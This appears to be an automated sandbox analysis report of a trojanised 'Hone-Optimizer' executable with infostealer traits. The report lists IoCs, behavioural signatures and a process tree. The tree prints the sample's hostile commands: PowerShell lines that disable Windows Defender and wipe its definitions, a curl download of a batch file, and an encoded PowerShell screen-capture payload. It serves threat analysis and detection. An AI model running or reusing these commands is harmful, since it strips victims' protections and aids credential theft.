Analysis
-
max time kernel
334s -
max time network
337s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-11-2024 11:53
Behavioral task
behavioral1
Sample
Hone-Optimizer.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
Hone-Optimizer.exe
-
Size
7.7MB
-
MD5
baa9792a0bb9c8df5521b14e425dbe09
-
SHA1
1cf257b5c2ac3c84d468a3a6a3dbc846f7d50d5e
-
SHA256
07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
-
SHA512
45e7285cbbddb8ed61d4a39a09f15b032d8e39534139e96fe81f522fd9a644e2461080ff861062a35f3dec517a55bf584683b17dc2381c6f683f09ae06a4a636
-
SSDEEP
98304:8VeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbdk+QqnWv9JTSPhlVX:8AYmOshoKMuIkhVastRL5Di3tKb0SPJX
Malware Config
Signatures
-
pid Process 3392 powershell.exe 4464 powershell.exe 5188 powershell.exe 3428 powershell.exe 2136 powershell.exe 3152 powershell.exe 5788 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Hone-Optimizer.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 3 IoCs
pid Process 748 bound.exe 4556 rar.exe 5988 dismhost.exe -
Loads dropped DLL 40 IoCs
pid Process 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5196 Hone-Optimizer.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe 5988 dismhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 2 discord.com 6 discord.com 8 raw.githubusercontent.com 9 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 1656 tasklist.exe 3596 tasklist.exe 4368 tasklist.exe 3476 tasklist.exe -
resource yara_rule behavioral2/files/0x001900000002abda-22.dat upx behavioral2/memory/5196-26-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp upx behavioral2/files/0x001900000002abc9-28.dat upx behavioral2/files/0x001900000002abd8-30.dat upx behavioral2/memory/5196-34-0x00007FFC432F0000-0x00007FFC432FF000-memory.dmp upx behavioral2/memory/5196-31-0x00007FFC41240000-0x00007FFC41263000-memory.dmp upx behavioral2/files/0x001900000002abce-39.dat upx behavioral2/memory/5196-41-0x00007FFC41210000-0x00007FFC4123D000-memory.dmp upx behavioral2/files/0x001a00000002abc8-42.dat upx behavioral2/memory/5196-44-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp upx behavioral2/files/0x001c00000002abd3-45.dat upx behavioral2/files/0x001c00000002abdf-47.dat upx behavioral2/memory/5196-50-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp upx behavioral2/memory/5196-48-0x00007FFC40120000-0x00007FFC40143000-memory.dmp upx behavioral2/files/0x001900000002abd2-51.dat upx behavioral2/memory/5196-53-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp upx behavioral2/files/0x001900000002abde-54.dat upx behavioral2/memory/5196-57-0x00007FFC432E0000-0x00007FFC432ED000-memory.dmp upx behavioral2/files/0x001900000002abd5-59.dat upx behavioral2/memory/5196-60-0x00007FFC3D4C0000-0x00007FFC3D4F3000-memory.dmp upx behavioral2/files/0x001900000002abd4-58.dat upx behavioral2/files/0x001c00000002abd9-62.dat upx behavioral2/memory/5196-66-0x00007FFC3C720000-0x00007FFC3C7ED000-memory.dmp upx behavioral2/memory/5196-69-0x00007FFC41240000-0x00007FFC41263000-memory.dmp upx behavioral2/memory/5196-67-0x00007FFC2B030000-0x00007FFC2B550000-memory.dmp upx behavioral2/memory/5196-65-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp upx behavioral2/files/0x001c00000002abcd-70.dat upx behavioral2/files/0x001900000002abcf-74.dat upx behavioral2/memory/5196-73-0x00007FFC3D680000-0x00007FFC3D694000-memory.dmp upx behavioral2/files/0x001900000002abe0-79.dat upx behavioral2/memory/5196-80-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp upx behavioral2/memory/5196-81-0x00007FFC2AF10000-0x00007FFC2B02C000-memory.dmp upx behavioral2/memory/5196-76-0x00007FFC40F50000-0x00007FFC40F5D000-memory.dmp upx behavioral2/memory/5196-119-0x00007FFC40120000-0x00007FFC40143000-memory.dmp upx behavioral2/memory/5196-120-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp upx behavioral2/memory/5196-121-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp upx behavioral2/memory/5196-253-0x00007FFC3D4C0000-0x00007FFC3D4F3000-memory.dmp upx behavioral2/memory/5196-266-0x00007FFC3C720000-0x00007FFC3C7ED000-memory.dmp upx behavioral2/memory/5196-267-0x00007FFC2B030000-0x00007FFC2B550000-memory.dmp upx behavioral2/memory/5196-279-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp upx behavioral2/memory/5196-285-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp upx behavioral2/memory/5196-280-0x00007FFC41240000-0x00007FFC41263000-memory.dmp upx behavioral2/memory/5196-303-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp upx behavioral2/memory/5196-327-0x00007FFC3C720000-0x00007FFC3C7ED000-memory.dmp upx behavioral2/memory/5196-328-0x00007FFC2B030000-0x00007FFC2B550000-memory.dmp upx behavioral2/memory/5196-326-0x00007FFC3D4C0000-0x00007FFC3D4F3000-memory.dmp upx behavioral2/memory/5196-325-0x00007FFC432E0000-0x00007FFC432ED000-memory.dmp upx behavioral2/memory/5196-324-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp upx behavioral2/memory/5196-323-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp upx behavioral2/memory/5196-322-0x00007FFC40120000-0x00007FFC40143000-memory.dmp upx behavioral2/memory/5196-321-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp upx behavioral2/memory/5196-320-0x00007FFC41210000-0x00007FFC4123D000-memory.dmp upx behavioral2/memory/5196-319-0x00007FFC432F0000-0x00007FFC432FF000-memory.dmp upx behavioral2/memory/5196-318-0x00007FFC41240000-0x00007FFC41263000-memory.dmp upx behavioral2/memory/5196-317-0x00007FFC2AF10000-0x00007FFC2B02C000-memory.dmp upx behavioral2/memory/5196-316-0x00007FFC40F50000-0x00007FFC40F5D000-memory.dmp upx behavioral2/memory/5196-315-0x00007FFC3D680000-0x00007FFC3D694000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000002fc80c284bade0450000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800002fc80c280000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809002fc80c28000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d2fc80c28000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002fc80c2800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5336 WMIC.exe 2352 WMIC.exe 2140 WMIC.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 3964 reg.exe 5080 reg.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 3392 powershell.exe 3428 powershell.exe 2136 powershell.exe 3428 powershell.exe 2136 powershell.exe 2136 powershell.exe 3392 powershell.exe 3392 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 4464 powershell.exe 4464 powershell.exe 3232 powershell.exe 3232 powershell.exe 5188 powershell.exe 5188 powershell.exe 4736 powershell.exe 4736 powershell.exe 3152 powershell.exe 3152 powershell.exe 5788 powershell.exe 5788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1656 tasklist.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeIncreaseQuotaPrivilege 3792 WMIC.exe Token: SeSecurityPrivilege 3792 WMIC.exe Token: SeTakeOwnershipPrivilege 3792 WMIC.exe Token: SeLoadDriverPrivilege 3792 WMIC.exe Token: SeSystemProfilePrivilege 3792 WMIC.exe Token: SeSystemtimePrivilege 3792 WMIC.exe Token: SeProfSingleProcessPrivilege 3792 WMIC.exe Token: SeIncBasePriorityPrivilege 3792 WMIC.exe Token: SeCreatePagefilePrivilege 3792 WMIC.exe Token: SeBackupPrivilege 3792 WMIC.exe Token: SeRestorePrivilege 3792 WMIC.exe Token: SeShutdownPrivilege 3792 WMIC.exe Token: SeDebugPrivilege 3792 WMIC.exe Token: SeSystemEnvironmentPrivilege 3792 WMIC.exe Token: SeRemoteShutdownPrivilege 3792 WMIC.exe Token: SeUndockPrivilege 3792 WMIC.exe Token: SeManageVolumePrivilege 3792 WMIC.exe Token: 33 3792 WMIC.exe Token: 34 3792 WMIC.exe Token: 35 3792 WMIC.exe Token: 36 3792 WMIC.exe Token: SeIncreaseQuotaPrivilege 3792 WMIC.exe Token: SeSecurityPrivilege 3792 WMIC.exe Token: SeTakeOwnershipPrivilege 3792 WMIC.exe Token: SeLoadDriverPrivilege 3792 WMIC.exe Token: SeSystemProfilePrivilege 3792 WMIC.exe Token: SeSystemtimePrivilege 3792 WMIC.exe Token: SeProfSingleProcessPrivilege 3792 WMIC.exe Token: SeIncBasePriorityPrivilege 3792 WMIC.exe Token: SeCreatePagefilePrivilege 3792 WMIC.exe Token: SeBackupPrivilege 3792 WMIC.exe Token: SeRestorePrivilege 3792 WMIC.exe Token: SeShutdownPrivilege 3792 WMIC.exe Token: SeDebugPrivilege 3792 WMIC.exe Token: SeSystemEnvironmentPrivilege 3792 WMIC.exe Token: SeRemoteShutdownPrivilege 3792 WMIC.exe Token: SeUndockPrivilege 3792 WMIC.exe Token: SeManageVolumePrivilege 3792 WMIC.exe Token: 33 3792 WMIC.exe Token: 34 3792 WMIC.exe Token: 35 3792 WMIC.exe Token: 36 3792 WMIC.exe Token: SeIncreaseQuotaPrivilege 2352 WMIC.exe Token: SeSecurityPrivilege 2352 WMIC.exe Token: SeTakeOwnershipPrivilege 2352 WMIC.exe Token: SeLoadDriverPrivilege 2352 WMIC.exe Token: SeSystemProfilePrivilege 2352 WMIC.exe Token: SeSystemtimePrivilege 2352 WMIC.exe Token: SeProfSingleProcessPrivilege 2352 WMIC.exe Token: SeIncBasePriorityPrivilege 2352 WMIC.exe Token: SeCreatePagefilePrivilege 2352 WMIC.exe Token: SeBackupPrivilege 2352 WMIC.exe Token: SeRestorePrivilege 2352 WMIC.exe Token: SeShutdownPrivilege 2352 WMIC.exe Token: SeDebugPrivilege 2352 WMIC.exe Token: SeSystemEnvironmentPrivilege 2352 WMIC.exe Token: SeRemoteShutdownPrivilege 2352 WMIC.exe Token: SeUndockPrivilege 2352 WMIC.exe Token: SeManageVolumePrivilege 2352 WMIC.exe Token: 33 2352 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3172 wrote to memory of 5196 3172 Hone-Optimizer.exe 80 PID 3172 wrote to memory of 5196 3172 Hone-Optimizer.exe 80 PID 5196 wrote to memory of 2948 5196 Hone-Optimizer.exe 81 PID 5196 wrote to memory of 2948 5196 Hone-Optimizer.exe 81 PID 5196 wrote to memory of 6028 5196 Hone-Optimizer.exe 82 PID 5196 wrote to memory of 6028 5196 Hone-Optimizer.exe 82 PID 5196 wrote to memory of 4076 5196 Hone-Optimizer.exe 83 PID 5196 wrote to memory of 4076 5196 Hone-Optimizer.exe 83 PID 5196 wrote to memory of 5812 5196 Hone-Optimizer.exe 84 PID 5196 wrote to memory of 5812 5196 Hone-Optimizer.exe 84 PID 5196 wrote to memory of 2748 5196 Hone-Optimizer.exe 87 PID 5196 wrote to memory of 2748 5196 Hone-Optimizer.exe 87 PID 2748 wrote to memory of 1656 2748 cmd.exe 91 PID 2748 wrote to memory of 1656 2748 cmd.exe 91 PID 5812 wrote to memory of 748 5812 cmd.exe 92 PID 5812 wrote to memory of 748 5812 cmd.exe 92 PID 6028 wrote to memory of 3392 6028 cmd.exe 93 PID 6028 wrote to memory of 3392 6028 cmd.exe 93 PID 2948 wrote to memory of 2136 2948 cmd.exe 95 PID 2948 wrote to memory of 2136 2948 cmd.exe 95 PID 4076 wrote to memory of 3428 4076 cmd.exe 96 PID 4076 wrote to memory of 3428 4076 cmd.exe 96 PID 748 wrote to memory of 2128 748 bound.exe 98 PID 748 wrote to memory of 2128 748 bound.exe 98 PID 2128 wrote to memory of 5528 2128 cmd.exe 99 PID 2128 wrote to memory of 5528 2128 cmd.exe 99 PID 2128 wrote to memory of 3964 2128 cmd.exe 100 PID 2128 wrote to memory of 3964 2128 cmd.exe 100 PID 2128 wrote to memory of 2628 2128 cmd.exe 101 PID 2128 wrote to memory of 2628 2128 cmd.exe 101 PID 2128 wrote to memory of 5100 2128 cmd.exe 102 PID 2128 wrote to memory of 5100 2128 cmd.exe 102 PID 2128 wrote to memory of 5080 2128 cmd.exe 103 PID 2128 wrote to memory of 5080 2128 cmd.exe 103 PID 2128 wrote to memory of 3244 2128 cmd.exe 104 PID 2128 wrote to memory of 3244 2128 cmd.exe 104 PID 5196 wrote to memory of 6108 5196 Hone-Optimizer.exe 105 PID 5196 wrote to memory of 6108 5196 Hone-Optimizer.exe 105 PID 6108 wrote to memory of 3792 6108 cmd.exe 107 PID 6108 wrote to memory of 3792 6108 cmd.exe 107 PID 5196 wrote to memory of 1908 5196 Hone-Optimizer.exe 108 PID 5196 wrote to memory of 1908 5196 Hone-Optimizer.exe 108 PID 1908 wrote to memory of 5336 1908 cmd.exe 110 PID 1908 wrote to memory of 5336 1908 cmd.exe 110 PID 5196 wrote to memory of 5856 5196 Hone-Optimizer.exe 111 PID 5196 wrote to memory of 5856 5196 Hone-Optimizer.exe 111 PID 5856 wrote to memory of 5236 5856 cmd.exe 113 PID 5856 wrote to memory of 5236 5856 cmd.exe 113 PID 5196 wrote to memory of 4108 5196 Hone-Optimizer.exe 114 PID 5196 wrote to memory of 4108 5196 Hone-Optimizer.exe 114 PID 4108 wrote to memory of 2352 4108 cmd.exe 116 PID 4108 wrote to memory of 2352 4108 cmd.exe 116 PID 5196 wrote to memory of 1676 5196 Hone-Optimizer.exe 117 PID 5196 wrote to memory of 1676 5196 Hone-Optimizer.exe 117 PID 1676 wrote to memory of 2140 1676 cmd.exe 119 PID 1676 wrote to memory of 2140 1676 cmd.exe 119 PID 5196 wrote to memory of 3520 5196 Hone-Optimizer.exe 120 PID 5196 wrote to memory of 3520 5196 Hone-Optimizer.exe 120 PID 5196 wrote to memory of 3344 5196 Hone-Optimizer.exe 121 PID 5196 wrote to memory of 3344 5196 Hone-Optimizer.exe 121 PID 3520 wrote to memory of 3596 3520 cmd.exe 124 PID 3520 wrote to memory of 3596 3520 cmd.exe 124 PID 3344 wrote to memory of 4368 3344 cmd.exe 125 PID 3344 wrote to memory of 4368 3344 cmd.exe 125 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5208 attrib.exe 5172 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5196 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:6028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5812 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF87.tmp\BF88.tmp\BF89.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\mode.comMode 130,456⤵PID:5528
-
-
C:\Windows\system32\reg.exereg add HKLM /F6⤵
- Modifies registry key
PID:3964
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f6⤵PID:2628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"6⤵PID:5100
-
-
C:\Windows\system32\reg.exereg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f6⤵
- Modifies registry key
PID:5080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "Disclaimer"6⤵PID:3244
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Hone" /v "Disclaimer" /f6⤵PID:6072
-
-
C:\Windows\system32\curl.execurl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"6⤵PID:5064
-
-
C:\Windows\system32\Dism.exedism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart6⤵
- Drops file in Windows directory
PID:5176 -
C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exeC:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe {16FFE513-AB3D-4775-805B-D0AAF557EA14}7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:5988
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f6⤵PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c date /t6⤵PID:408
-
-
C:\Windows\system32\reg.exereg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y6⤵PID:5088
-
-
C:\Windows\system32\reg.exereg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y6⤵PID:3620
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:4648
-
-
C:\Windows\System32\choice.exeC:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "6⤵PID:2688
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:6108 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:5336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:5856 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:5236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3096
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAA